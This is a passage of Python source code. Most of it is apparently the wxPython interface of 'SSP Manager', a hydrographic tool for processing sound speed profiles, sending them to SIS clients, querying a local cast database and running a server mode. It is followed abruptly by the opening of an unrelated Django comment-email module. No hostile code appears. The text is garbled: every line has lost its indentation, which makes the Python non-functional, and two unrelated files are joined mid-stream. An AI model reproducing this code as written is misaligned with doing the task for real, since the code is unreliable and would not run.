dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.ssp_woa is None:
msg = "Functionality disabled: failure in WOA2009 lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
# And then extend by WOA
self.prj.ssp_data.extend(self.prj.ssp_woa, ext_type)
else:
raise SspError("unsupported extension source: %s" % self.prj.s.ssp_extension_source)
self._update_plot()
msg = 'Profile extended to depth %d m using source type %s' \
% (self.prj.ssp_data.data[Dicts.idx['depth'], self.prj.ssp_data.data.shape[1] - 1], ext_type)
log.info(msg)
self.prj.ssp_data.modify_source_info("extension type %s" % ext_type)
self.status_message = 'Profile extended using source type %s' % ext_type
def on_process_preview_thinning(self, event):
log.info("preview thinning")
self.prj.ssp_data.prepare_sis_data(thin=True)
self._update_plot()
log.info('Preview the thinning step required by some client types')
self.status_message = 'Preview thinning'
def on_process_send_profile(self, evt):
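"""Transmit the current profile to all configured clients, optionally applying the refraction-monitor corrector and auto-exporting the selected formats"""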
if self.prj.s.auto_export_on_send and self.prj.count_export_formats() == 0:
msg = "The selected 'auto-export' option requires selection of export formats from Export sub-menu.\n" \
"Send anyway or cancel?"
dlg = wx.MessageDialog(None, msg, "Auto-export option", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
if not self.prj.ssp_recipient_ip:
dlg = wx.TextEntryDialog(None, 'Enter Remote IP address', 'Text Entry')
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return
# read the entered value before destroying the dialog
recipient_ip = dlg.GetValue()
dlg.Destroy()
try:
# inet_aton validates IPv4 only (inet_pton would be needed for IPv6)
socket.inet_aton(recipient_ip)
except socket.error:
dlg = wx.MessageDialog(None, "Error: Invalid IP address", "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
self.prj.ssp_recipient_ip = recipient_ip
if self.ref_monitor:
self.ref_monitor.pause_corrections()
corrector = self.ref_monitor.get_corrector()
depth = self.ref_monitor.get_mean_depth()
# Only if the server is not running
if corrector != 0.0:
msg = "Do you really want to apply the corrector calculated with the Refraction Monitor?\n" \
"This will manipulate the SSP (corrector: %.1f, depth: %.1f)" \
% (corrector, depth)
dlg = wx.MessageDialog(None, msg, "Warning", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
if result == wx.ID_CANCEL:
corrector = 0.0
dlg.Destroy()
if corrector != 0.0:
log.info("applying corrector: %s %s" % (corrector, depth))
if self.prj.surface_speed_applied:
idx = self.prj.ssp_data.data[Dicts.idx['depth'], :] > self.prj.ssp_applied_depth
self.prj.ssp_data.data[Dicts.idx['speed'], idx] = \
self.prj.ssp_data.data[Dicts.idx['speed'], idx] + corrector
else:
self.prj.ssp_data.data[Dicts.idx['speed'], :] = \
self.prj.ssp_data.data[Dicts.idx['speed'], :] + corrector
self.ref_monitor.set_corrector(0)
# loop through client list
success = True
fmt = None
for client in range(self.prj.s.client_list.num_clients):
if self.prj.s.sis_auto_apply_manual_casts:
fmt = Dicts.kng_formats['S01']
else:
fmt = Dicts.kng_formats['S12']
msg = "Transmitting cast to %s" % self.prj.s.client_list.clients[client].IP
log.info(msg)
self.status_message = msg
self._update_status()
success = self.prj.send_cast(self.prj.s.client_list.clients[client], fmt)
if self.prj.s.sis_auto_apply_manual_casts:
if success:
if self.prj.s.client_list.clients[client].protocol == "SIS":
log.info("Reception confirmed from " + self.prj.s.client_list.clients[client].IP)
self.status_message = "Reception confirmed!"
msg = "SIS confirmed the SSP reception!"
dlg = wx.MessageDialog(None, msg, "SIS acknowledge", wx.OK)
dlg.ShowModal()
dlg.Destroy()
if self.prj.has_sippican_to_process:
self.prj.has_sippican_to_process = False
if self.prj.has_mvp_to_process:
self.prj.has_mvp_to_process = False
else:
self.status_message = "Transmitted cast, confirm reception in %s" % (
self.prj.s.client_list.clients[client].protocol)
else:
msg = "Cannot confirm reception of profile for client %s, please check SIS:\n" % (
self.prj.s.client_list.clients[client].IP)
msg += "1) Check sound speed file name in SIS run-time parameters " \
"and match date/time in SIS .asvp filename with cast date/time to ensure receipt\n"
msg += "2) Ensure SVP datagram is being distributed to this IP " \
"on port %d to enable future confirmations" % self.prj.s.km_listen_port
log.info(msg)
dlg = wx.MessageDialog(None, msg, "Acknowledge", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
if not self.prj.s.sis_auto_apply_manual_casts:
msg = "Profile transmitted, SIS is waiting for operator confirmation."
log.info(msg)
dlg = wx.MessageDialog(None, msg, "Acknowledge", wx.OK)
dlg.ShowModal() # Show it
dlg.Destroy()
msg = "Transmitted Data: %s" % self.prj.ssp_data.convert_km(fmt)
log.info(msg)
# Now that we're done sending to clients, auto-export files if desired
if self.prj.s.auto_export_on_send:
self.prj.formats_export("USER")
if success:
self.prj.time_of_last_tx = dt.datetime.utcnow()
else:
self.prj.time_of_last_tx = None
self._update_plot()
if self.ref_monitor:
self.ref_monitor.resume_corrections()
if self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
# If we had received a sippican cast over UDP
# then update the display to remove the RED background
self.prj.has_sippican_to_process = False
self.prj.has_mvp_to_process = False
self._update_plot()
def on_process_store_db(self, event):
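"""Store the current SSP cast in the local database"""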
log.info("store current SSP:\n%s" % self.prj.ssp_data)
# create a collection with only the current cast
ssp_coll = SspCollection()
ssp_coll.append(self.prj.ssp_data)
# add the created collection to the local db
ssp_db = SspDb()
ssp_db.add_casts(ssp_coll)
ssp_db.disconnect()
def on_process_redo_processing(self, event):
msg = "Do you really want to reload the stored raw data?\n" \
"This implies to lose all the applied processing actions!"
dlg = wx.MessageDialog(None, msg, "Restart processing", wx.YES | wx.NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_NO:
return
log.info("restart processing")
self.prj.ssp_data.restart_processing()
self._update_plot()
log.info('Restart processing using stored raw data')
self.status_message = 'Restart processing'
def on_process_log_metadata(self, evt):
"""Activate the logging of the processing metadata"""
flag = self.ProcessLogMetadata.IsChecked()
# to be able to log the first and the last message
if flag:
self.prj.activate_logging_on_db()
else:
self.prj.deactivate_logging_on_db()
# def on_process_express_mode(self, evt):
# """DISABLED SINCE USERS TEND TO MISUSE THIS FUNCTIONALITY"""
# msg = "Are you sure you want to do express processing?\nThis will deliver the profile to the sounder."
# dlg = wx.MessageDialog(None, msg, "Question", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
# result = dlg.ShowModal()
# dlg.Destroy()
# if result == wx.ID_CANCEL:
# return
# if self.prj.ssp_data.sensor_type == Dict.sensor_types["XBT"]:
# self.on_process_load_salinity(evt)
# elif self.prj.ssp_data.sensor_type == "XSV" or self.prj.ssp_data.sensor_type == "SVP":
# self.on_process_load_temp_and_sal(evt)
# self.on_process_load_surface_ssp(evt)
# self.on_process_extend(evt)
# self.on_process_send_profile(evt)
# ####### Database ######
def on_db_query_internal_db(self, event):
log.info("query internal db")
self._query_db()
def on_db_query_external_db(self, event):
log.info("query external db")
# retrieve the name of the format
selection_filter = "DB files (*.db,*.DB)|*.db;*.DB|All File (*.*)|*.*"
dlg = wx.FileDialog(self, "External DB Selection", "", "", selection_filter,
style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
if dlg.ShowModal() != wx.ID_OK:
dlg.Destroy()
return
db_directory = dlg.GetDirectory()
db_file = dlg.GetFilename()
dlg.Destroy()
db_path = os.path.join(db_directory, db_file)
self._query_db(db_path)
def _query_db(self, db_path=None):
"""Query and load SSP from a DB (both internal and extenal)"""
try:
if db_path is None:
ssp_db = SspDb()
else:
ssp_db = SspDb(db_path=db_path)
except HyOError as e:
msg = '%s' % e
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
pk_list = ssp_db.list_all_ssp_pks()
# print(pk_list)
if len(pk_list) == 0:
msg = 'The DB is empty. Load and store an SSP first!'
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
ssp_db.disconnect()
return
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
dlg_list = [("%04d: %s @ %s [%s]" % (tp[0], tp[1], tp[2], Dicts.first_match(Dicts.sensor_types, int(tp[4]))))
for tp in pk_list]
# print(dlg_list)
dialog = wx.SingleChoiceDialog(None, "Pick a stored SSP", "Local DB", dlg_list)
selection = dialog.ShowModal()
# read the selection before destroying the dialog
selected_index = dialog.GetSelection()
selected_label = dialog.GetStringSelection()
dialog.Destroy()
if selection != wx.ID_OK:
ssp_db.disconnect()
return
# actually loading the data
self.prj.ssp_data = ssp_db.get_ssp_by_pk(pk_list[selected_index][0])
self.prj.filename = "%s_LocalDB" % self.prj.ssp_data.original_path
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.ssp_woa, self.prj.ssp_woa_min, self.prj.ssp_woa_max = \
self.prj.woa09_atlas.query(self.prj.ssp_data.latitude, self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
if self.prj.ssp_woa is not None:
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_plot()
self._update_state(self.gui_state['OPEN'])
self.status_message = "Loaded SSP from local DB"
log.info("Loaded selected SSP: %s [%s]\n" % (dialog.GetSelection(), dialog.GetStringSelection()))
ssp_db.disconnect()
# Delete
def on_db_delete_internal(self, event):
log.info("deletion from internal db")
self._delete_db_ssp()
def on_db_delete_external(self, event):
log.info("deletion from external db")
# retrieve the name of the format
selection_filter = "DB files (*.db,*.DB)|*.db;*.DB|All File (*.*)|*.*"
dlg = wx.FileDialog(self, "External DB Selection", "", "", selection_filter,
style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
if dlg.ShowModal() != wx.ID_OK:
dlg.Destroy()
return
db_directory = dlg.GetDirectory()
db_file = dlg.GetFilename()
dlg.Destroy()
db_path = os.path.join(db_directory, db_file)
self._delete_db_ssp(db_path)
def _delete_db_ssp(self, db_path=None):
"""Delete SSP entries from a DB (both internal and extenal)"""
try:
if db_path is None:
ssp_db = SspDb()
else:
ssp_db = SspDb(db_path=db_path)
except HyOError as e:
msg = '%s' % e
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
pk_list = ssp_db.list_all_ssp_pks()
# print(pk_list)
if len(pk_list) == 0:
msg = 'The DB is empty. Nothing to delete!'
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
ssp_db.disconnect()
return
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
dlg_list = [("%04d: %s @ %s [%s]" % (tp[0], tp[1], tp[2], Dicts.first_match(Dicts.sensor_types, int(tp[4]))))
for tp in pk_list]
# print(dlg_list)
dialog = wx.SingleChoiceDialog(None, "Pick a stored SSP", "Local DB", dlg_list)
selection = dialog.ShowModal()
# read the selection before destroying the dialog
selected_index = dialog.GetSelection()
dialog.Destroy()
if selection != wx.ID_OK:
ssp_db.disconnect()
return
# actually do the deletion
try:
ssp_db.delete_ssp_by_pk(pk_list[selected_index][0])
except HyOError as e:
msg = '%s' % e
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
# Export
def on_db_export_shp(self, event):
log.info("exporting as shapefile")
self._db_export(GdalAux.ogr_formats[b'ESRI Shapefile'])
def on_db_export_kml(self, event):
log.info("exporting as kml")
self._db_export(GdalAux.ogr_formats[b'KML'])
def on_db_export_csv(self, event):
log.info("exporting as csv")
self._db_export(GdalAux.ogr_formats[b'CSV'])
@classmethod
def _db_export(cls, ogr_format):
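"""Export the DB SSP view in the given OGR format, then open the export folder"""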
ssp_db = SspDb()
try:
ssp_db.convert_ssp_view_to_ogr(ogr_format)
except HyOError as e:
msg = '%s' % e
dlg = wx.MessageDialog(None, msg, "Local DB", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
Helper.explore_folder(ssp_db.export_folder)
# Plot
def on_db_plot_map_ssp(self, event):
log.info("plot a map with all SSPs")
ssp_db = SspDb()
ssp_db.map_ssp_view()
def on_db_plot_daily_ssp(self, event):
log.info("plot daily SSPs")
ssp_db = SspDb()
ssp_db.create_daily_plots(save_fig=False)
def on_db_save_daily_ssp(self, event):
log.info("save daily SSPs")
ssp_db = SspDb()
ssp_db.create_daily_plots(save_fig=True)
Helper.explore_folder(ssp_db.plots_folder)
# ####### Tools ######
def on_tools_geo_monitor(self, evt):
"""Display a map with the profile position"""
if not self.geo_monitor:
log.info("geo monitor not available")
return
# Request the current SVP cast from the clients before launching; take the first one that comes through.
self.prj.km_listener.ssp = None
for client in range(self.prj.s.client_list.num_clients):
log.info("Testing client %s for position ..." % self.prj.s.client_list.clients[client].IP)
self.prj.ssp_recipient_ip = self.prj.s.client_list.clients[client].IP
self.prj.get_cast_from_sis()
if self.prj.km_listener.ssp:
log.info("... got SSP > valid client")
break
else:
log.info("... not valid SSP > skip this client")
if not self.prj.km_listener.ssp:
msg = "Unable to run the geo-monitor since no casts were retrieved from SIS clients"
dlg = wx.MessageDialog(None, msg, "Clients issue", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
self.geo_monitor.OnShow()
def on_tools_refraction_monitor(self, evt):
"""Display a refraction monitor"""
if not self.ref_monitor:
log.info("refraction monitor not available")
return
# Request the current SVP cast from the clients before launching; take the first one that comes through.
self.prj.km_listener.ssp = None
for client in range(self.prj.s.client_list.num_clients):
log.info("Testing client %s for position ..." % self.prj.s.client_list.clients[client].IP)
self.prj.ssp_recipient_ip = self.prj.s.client_list.clients[client].IP
self.prj.get_cast_from_sis()
if self.prj.km_listener.ssp:
log.info("... got SSP > valid client")
break
else:
log.info("... not valid SSP > skip this client")
if not self.prj.km_listener.ssp:
msg = "Unable to run the ref-monitor since no casts were retrieved from SIS clients"
dlg = wx.MessageDialog(None, msg, "Clients issue", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
log.info("got SIS ssp (samples %s)" % self.prj.km_listener.ssp.num_entries)
if self.state == self.gui_state['CLOSED']:
# Maybe when running in this state, the requested SVP is
# loaded into the SVP Editor? This behavior is inconsistent
# with other modes (OPEN, SERVER) where the profile is already loaded.
# Perhaps should force user to open a profile from SIS?
# Could then limit ability to launch refraction monitor from the
# OPEN and SERVER states and have it disabled in the CLOSED state.
log.info("we are CLOSED!")
ssp = self.prj.km_listener.ssp.convert_ssp()
if self.ref_monitor:
self.ref_monitor.set_ssp(ssp)
elif (self.state == self.gui_state['OPEN']) or (self.state == self.gui_state['SERVER']):
if self.ref_monitor:
self.ref_monitor.set_ssp(self.prj.ssp_data)
self.ref_monitor.OnShow()
def on_tools_user_inputs(self, evt):
self.inputs_viewer.OnShow()
def on_tools_modify_settings(self, evt):
self.settings_tool = ssp_settings.SSPSettings(parent=None)
self.settings_tool.Show()
def on_tools_view_settings(self, evt):
self.settings_viewer.OnShow()
def on_tools_reload_settings(self, evt):
self.prj.s.load_settings_from_db()
# ### SERVER ###
def on_tools_server_start(self, event):
"""start the server mode"""
dlg = wx.MessageDialog(self,
"Do you really want to start the Server Mode?\n\n"
"The Server Mode creates SSPs based on oceanographic models for SIS.\n"
"Thus, it is meant for use in transit, NOT for systematic seabed mapping.\n"
"This Mode will OVERWRITE the current SIS SSP.\n",
"Server Mode", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
# - check and ask for draft
if not self.prj.vessel_draft:
self.get_transducer_draft()
# if still not available, return
if self.prj.vessel_draft is None:
return
else: # store since it can change with updates
self.prj.server.server_vessel_draft = self.prj.vessel_draft
log.info("Starting server")
# - start the server
if self.prj.server.check_settings():
self._update_state(self.gui_state["SERVER"])
self.p.display_woa = True
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
else:
dlg = wx.MessageDialog(self, "Unable to start the Server Mode", "Server Mode", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
self.prj.server.set_refraction_monitor(self.ref_monitor)
threading.Thread(target=self.prj.server.run).start()
# Now set up a timer for cast plot updates
self.prj.server_timer = TimerThread(self.monitor_server, timing=1)
self.prj.server_timer.start()
def on_tools_server_send(self, e):
log.info("forcing server to send profile NOW!")
self.prj.server.force_send = True
def monitor_server(self):
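"""Timer callback: stop the server if it flagged an error, notify the user (unless casts are pending), and refresh the plot when requested"""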
if self.prj.server.stopped_on_error:
self.prj.server.stop(by_thread=True)
if (not self.prj.has_sippican_to_process) and (not self.prj.has_mvp_to_process):
msg = "Server stopped with message: %s" % self.prj.server.error_message
dlg = wx.MessageDialog(None, msg, "Acknowledge", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
self.clear_app()
else:
if self.prj.server.update_plot:
self._update_plot()
self.prj.server.update_plot = False
def on_tools_server_stop(self, e):
dlg = wx.MessageDialog(self, "Do you really want to stop the server?", "Confirm Server Stop",
wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
log.info("User instructed to stop the Server Mode")
self.prj.server.stop()
self.clear_app()
def on_tools_server_log_metadata(self, event):
"""Activate the logging of the server metadata"""
flag = self.ServerLogMetadata.IsChecked()
if flag:
self.prj.activate_server_logging_on_db()
else:
self.prj.deactivate_server_logging_on_db()
# ### REF CAST ###
def on_tools_set_reference_cast(self, evt):
"""set a reference cast"""
log.info("set as reference cast:\n%s" % self.prj.ssp_data)
self.prj.ssp_reference = copy.deepcopy(self.prj.ssp_data)
self.prj.ssp_reference_filename = self.prj.filename
self._update_plot()
def on_tools_edit_reference_cast(self, evt):
if not self.prj.ssp_reference:
return
if self.prj.has_ssp_loaded:
msg = 'Must close currently loaded profile to edit the reference profile. Proceed?'
dlg = wx.MessageDialog(None, msg, "Question", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal() # Show it
dlg.Destroy()
if result == wx.ID_CANCEL:
return
self.prj.clean_project()
self.clear_app()
self.prj.ssp_data = copy.deepcopy(self.prj.ssp_reference)
self.prj.filename = self.prj.ssp_reference_filename
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.ssp_woa, self.prj.ssp_woa_min, self.prj.ssp_woa_max = self.prj.woa09_atlas.query(
self.prj.ssp_data.latitude,
self.prj.ssp_data.longitude,
self.prj.ssp_data.date_time)
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_state(self.gui_state['OPEN'])
self._update_plot()
self.status_message = "Loaded %s" % self.prj.filename
def on_tools_clear_reference_cast(self, evt):
self.prj.ssp_reference = None
self.prj.ssp_reference_filename = None
self._update_plot()
# ####### HELP ######
def on_help_manual(self, event):
""" Open manual """
# manual_path = os.path.abspath(os.path.join(self.here, os.path.pardir, "docs", "manual.pdf"))
# if not os.path.isfile(manual_path):
# log.warning("missing manual at: %s" % manual_path)
# return
# log.info("open manual: %s" % manual_path)
# Helper.explore_folder(manual_path)
# Open the url with the online documentation for SSP Manager
import webbrowser
webbrowser.open('http://giumas.github.io/hyo_ssp_manager/latest/index.html')
def on_help_about(self, e):
"""Info about the application"""
import platform
from hydroffice import base
from hydroffice import ssp
current_year = dt.datetime.now().strftime("%Y")
dlg = wx.AboutDialogInfo()
dlg.SetName("SSP Manager")
dlg.SetVersion(self.version)
dlg.SetLicense(self.license)
dlg.SetIcon(wx.Icon(os.path.join(self.here, "media", "ccom.png"), wx.BITMAP_TYPE_PNG))
about_description = "SSP Manager processes XBT/SVP/CTD data for being used by \n" \
"acoustic systems.\n\n" \
"This work is/has been funded by:\n" \
" - NOAA grant NA10NOS4000073\n" \
" - NSF grant 1150574\n\n" \
"For bugs and unsupported formats, please send an email \n" \
"(with attached the data files to reproduce and troubleshoot \n" \
"the issue!) to:\n" \
" - hydroffice.ssp_manager@ccom.unh.edu\n\n" \
"For code contributions and general comments, write to:\n" \
" - gmasetti@ccom.unh.edu\n" \
" - brc@ccom.unh.edu\n" \
" - matthew.wilson@noaa.gov\n" \
"Contributors:\n" \
" - glen.rice@noaa.gov\n\n" \
"Environment:\n" \
" - os: %s [%sbit]\n" \
" - python: %s [%sbit]\n" \
" - wxPython: %s\n" \
" - matplotlib: %s\n" \
" - hydroffice.base: %s\n" \
" - hydroffice.ssp: %s" % \
(
os.name, "64" if Helper.is_64bit_os() else "32",
platform.python_version(), "64" if Helper.is_64bit_python() else "32",
wx.__version__,
matplotlib.__version__,
base.__version__,
ssp.__version__
)
dlg.SetDescription(about_description)
dlg.SetCopyright("%s (C) UNH/CCOM" % current_year)
wx.AboutBox(dlg)
################################################
### USER DIALOGS ###
def get_transducer_draft(self):
"""Ask user for transducer draft"""
if self.prj.km_listener.xyz88:
self.prj.vessel_draft = self.prj.km_listener.xyz88.transducer_draft
return
dlg = wx.TextEntryDialog(None, 'Enter the transducer draft', 'Transducer draft')
if dlg.ShowModal() == wx.ID_CANCEL:
self.prj.vessel_draft = None
dlg.Destroy()
return
dlg_value = dlg.GetValue()
dlg.Destroy()
try:
self.prj.vessel_draft = float(dlg_value)
except ValueError:
msg = "Invalid draft entry: %s" % dlg_value
dlg = wx.MessageDialog(None, msg, "Invalid value", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
self.prj.vessel_draft = None
return
def get_position(self):
"""Ask user for position, if not available"""
latitude = None
longitude = None
if self.prj.km_listener.nav:
msg = "Geographic location required for pressure/depth conversion and atlas lookup.\n" \
"Use geographic position from SIS?\nChoose 'no' to enter position manually."
dlg = wx.MessageDialog(None, msg, "Question", wx.YES | wx.NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_YES:
latitude = self.prj.km_listener.nav.latitude
longitude = self.prj.km_listener.nav.longitude
msg = 'User set cast position %lf %lf from SIS input' % (latitude, longitude)
log.info(msg)
elif result == wx.ID_NO:
latitude = None
longitude = None
if not latitude or not longitude:
# latitude
while True:
dlg = wx.TextEntryDialog(None, "Geographic location required for pressure/depth conversion and atlas "
"lookup.Enter latitude as signed decimal degrees (-10.123).",
"Latitude")
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return [None, None]
else:
try:
latitude = float(dlg.GetValue())
dlg.Destroy()
break
except ValueError:
pass
# longitude
while True:
dlg = wx.TextEntryDialog(None, "Geographic location required for pressure/depth conversion and atlas "
"lookup. Enter longitude as signed decimal degrees (-50.123).",
"Longitude")
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return [None, None]
else:
try:
longitude = float(dlg.GetValue())
dlg.Destroy()
break
except ValueError:
pass
msg = 'Manual user input position: %lf %lf' % (latitude, longitude)
log.info(msg)
return [latitude, longitude]
def get_date(self):
"""Ask user for date, if not available"""
# SIS specific
if self.prj.km_listener.nav:
msg = "Date required for database lookup.\nUse date from SIS?\nChoose 'no' to enter date manually."
dlg = wx.MessageDialog(None, msg, "Question", wx.YES | wx.NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_YES:
date = self.prj.km_listener.nav.dg_time
if date:
msg = 'Cast date %s from SIS input' % date
log.info(msg)
return date
else:
msg = 'Invalid date in SIS datagram'
log.info(msg)
# date from the machine clock
msg = "Date required for database lookup.\nUse UTC date from this machine?\nChoose 'no' to enter date manually."
dlg = wx.MessageDialog(None, msg, "Question", wx.YES | wx.NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_YES:
date = dt.datetime.utcnow()
msg = 'User set cast date %s from computer clock' % date
log.info(msg)
return date
# user input date / time
while True:
msg = "Date required for database lookup.\nPlease enter date (YYYY-MM-DD)."
dlg = wx.TextEntryDialog(None, msg, 'Date')
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return None
else:
date_string = dlg.GetValue()
dlg.Destroy()
try:
dt.datetime(int(date_string[0:4]), int(date_string[5:7]), int(date_string[8:10]))
break
except ValueError:
continue
while True:
msg = "Date required for database lookup.\nPlease enter time (HH:MM:SS)."
dlg = wx.TextEntryDialog(None, msg, 'Time')
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return None
else:
cast_time = dlg.GetValue()
dlg.Destroy()
try:
date = dt.datetime(int(date_string[0:4]), int(date_string[5:7]), int(date_string[8:10]),
int(cast_time[0:2]), int(cast_time[3:5]), int(cast_time[6:8]), 0)
msg = 'User input cast date %s' % date
log.info(msg)
return date
except ValueError:
pass
# ###############################################
# ### DEBUGGING ###
def _update_state(self, state):
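"""Enable all menu items, then selectively disable them according to the given GUI state"""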
for item in sspmanager_ui.MENUS_ALL: # Enable ALL the menu items
self.GetMenuBar().FindItemById(item).Enable(True)
# selectively disable some based on the state
if state == self.gui_state["CLOSED"]:
for item in sspmanager_ui.MENUS_DISABLED_ON_CLOSED:
self.GetMenuBar().FindItemById(item).Enable(False)
if self.ref_monitor:
self.ref_monitor.set_ssp(None)
self.ref_monitor.hide()
elif state == self.gui_state["OPEN"]:
for item in sspmanager_ui.MENUS_DISABLED_ON_OPEN:
self.GetMenuBar().FindItemById(item).Enable(False)
if self.prj.ssp_data.sensor_type != Dicts.sensor_types["XBT"]:
self.ProcessLoadSal.Enable(False)
if self.prj.ssp_data.sensor_type != Dicts.sensor_types["XSV"] \
and self.prj.ssp_data.sensor_type != Dicts.sensor_types["SVP"]:
self.ProcessLoadTempSal.Enable(False)
if self.ref_monitor:
self.ref_monitor.set_ssp(self.prj.ssp_data)
elif state == self.gui_state["SERVER"]:
for item in sspmanager_ui.MENUS_DISABLED_ON_SERVER:
self.GetMenuBar().FindItemById(item).Enable(False)
if self.ref_monitor:
self.ref_monitor.set_ssp(None)
else:
raise SspError("Passed wrong state type: %s is %s" % (state, type(state)))
self.state = state
def _update_status(self):
"""Provide info from SIS to the user through status bar"""
self.frame_statusbar.SetStatusText(self.status_message, 0)
# in case that the SIS listener is absent
if self.prj.km_listener is None:
self.frame_statusbar.SetStatusText("Disabled SIS listener", 1)
return
sis_info_str = str()
if self.prj.km_listener.nav is not None:
# time stamp
if self.prj.km_listener.nav.dg_time is not None:
sis_info_str = "%s, " % (self.prj.km_listener.nav.dg_time.strftime("%H:%M:%S"))
else:
sis_info_str = "NA, "
# position
if (self.prj.km_listener.nav.latitude is not None) and \
(self.prj.km_listener.nav.longitude is not None):
latitude = self.prj.km_listener.nav.latitude
if latitude >= 0:
letter = "N"
else:
letter = "S"
lat_min = float(60 * math.fabs(latitude - int(latitude)))
lat_str = "%02d\N{DEGREE SIGN}%7.3f'%s" % (int(math.fabs(latitude)), lat_min, letter)
longitude = self.prj.km_listener.nav.longitude
if longitude < 0:
letter = "W"
else:
letter = "E"
lon_min = float(60 * math.fabs(longitude - int(longitude)))
lon_str = "%03d\N{DEGREE SIGN}%7.3f'%s" % (int(math.fabs(longitude)), lon_min, letter)
sis_info_str += "(%s, %s), " % (lat_str, lon_str)
else:
sis_info_str += "(NA, NA), "
if self.prj.km_listener.xyz88 is not None:
if self.prj.km_listener.xyz88.sound_speed is not None:
sis_info_str += '%.1f m/s, ' % self.prj.km_listener.xyz88.sound_speed
self.prj.surface_sound_speed = self.prj.km_listener.xyz88.sound_speed
self.prj.vessel_draft = self.prj.km_listener.xyz88.transducer_draft
else:
sis_info_str += 'NA m/s, '
self.prj.surface_sound_speed = None
self.prj.vessel_draft = None
if (self.prj.km_listener.xyz88.number_beams is not None) and \
(self.prj.km_listener.xyz88.depth is not None) and \
(self.prj.km_listener.xyz88.transducer_draft is not None) and \
(self.prj.km_listener.xyz88.detection_information is not None):
mean_depth = 0.0
depth_count = 0
for beam in range(self.prj.km_listener.xyz88.number_beams):
if int(self.prj.km_listener.xyz88.detection_information[beam]) & 0x80 != 0:
# We skip beams without valid detections
continue
mean_depth = mean_depth + self.prj.km_listener.xyz88.depth[beam]
depth_count += 1
if depth_count > 0:
mean_depth = mean_depth / depth_count + self.prj.km_listener.xyz88.transducer_draft
sis_info_str += '%.1f m' % mean_depth
self.prj.mean_depth = mean_depth
else:
sis_info_str += 'NA m'
self.prj.mean_depth = None
else:
sis_info_str += 'XYZ88 NA [Pinging?]'
self.prj.mean_depth = None
self.prj.surface_sound_speed = None
self.prj.vessel_draft = None
self.frame_statusbar.SetStatusText(sis_info_str, 1)
|
email.py
|
from threading import Thread
from django.contrib.sites.shortcuts import get_current_site
from django.core import signing
from django.core.mail import EmailMultiAlternatives, get_connection
from django.template import loader
from django.urls import reverse
from comment.conf import settings
from comment.messages import EmailInfo
from comment.models import Follower
from comment.utils import get_username_for_comment
class DABEmailService(object):
def __init__(self, comment, request):
self.comment = comment
self.request = request
self.sender = settings.COMMENT_FROM_EMAIL
self.is_html = settings.COMMENT_SEND_HTML_EMAIL
self._email_thread = None
def get_msg_context(self, **context):
context['comment'] = self.comment
context['site'] = get_current_site(self.request)
context['contact'] = settings.COMMENT_CONTACT_EMAIL
return context
def get_message(self, subject, body, receivers, html_msg=None):
msg = EmailMultiAlternatives(subject, body, self.sender, receivers)
if html_msg:
msg.attach_alternative(html_msg, 'text/html')
return msg
